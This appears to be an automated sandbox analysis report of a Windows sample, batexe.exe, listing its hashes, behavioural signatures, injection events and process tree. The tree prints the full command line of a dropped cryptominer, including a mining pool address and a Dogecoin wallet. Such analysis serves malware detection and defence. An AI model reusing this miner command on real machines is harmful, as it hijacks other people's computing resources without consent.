Analysis
max time kernel: 291s
max time network: 305s
platform: windows10-2004_x64
resource: win10v2004-20231215-ja
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
submitted: 20/02/2024, 12:35
Behavioral task behavioral1
Sample: batexe.exe
Resource: win10-20240214-ja

Behavioral task behavioral2
Sample: batexe.exe
Resource: win10v2004-20231215-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation | b2e.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation | batexe.exe

Executes dropped EXE (2 IoCs)
pid | Process
2328 | b2e.exe
3116 | cpuminer-sse2.exe

Loads dropped DLL (5 IoCs)
pid | Process
3116 | cpuminer-sse2.exe
3116 | cpuminer-sse2.exe
3116 | cpuminer-sse2.exe
3116 | cpuminer-sse2.exe
3116 | cpuminer-sse2.exe

Yara rule match
resource | yara_rule
behavioral2/memory/4192-9-0x0000000000400000-0x000000000393A000-memory.dmp | upx

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 4192 wrote to memory of 2328 | 4192 | batexe.exe | 85
PID 4192 wrote to memory of 2328 | 4192 | batexe.exe | 85
PID 4192 wrote to memory of 2328 | 4192 | batexe.exe | 85
PID 2328 wrote to memory of 3620 | 2328 | b2e.exe | 86
PID 2328 wrote to memory of 3620 | 2328 | b2e.exe | 86
PID 2328 wrote to memory of 3620 | 2328 | b2e.exe | 86
PID 3620 wrote to memory of 3116 | 3620 | cmd.exe | 89
PID 3620 wrote to memory of 3116 | 3620 | cmd.exe | 89
Processes (indentation shows the parent/child relationship in the process tree)

C:\Users\Admin\AppData\Local\Temp\batexe.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4192

  C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 2328

    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\41D6.tmp\batchfile.bat" "
      - Suspicious use of WriteProcessMemory
      PID: 3620

      C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
        - Executes dropped EXE
        - Loads dropped DLL
        PID: 3116
Network
MITRE ATT&CK Enterprise v15
Downloads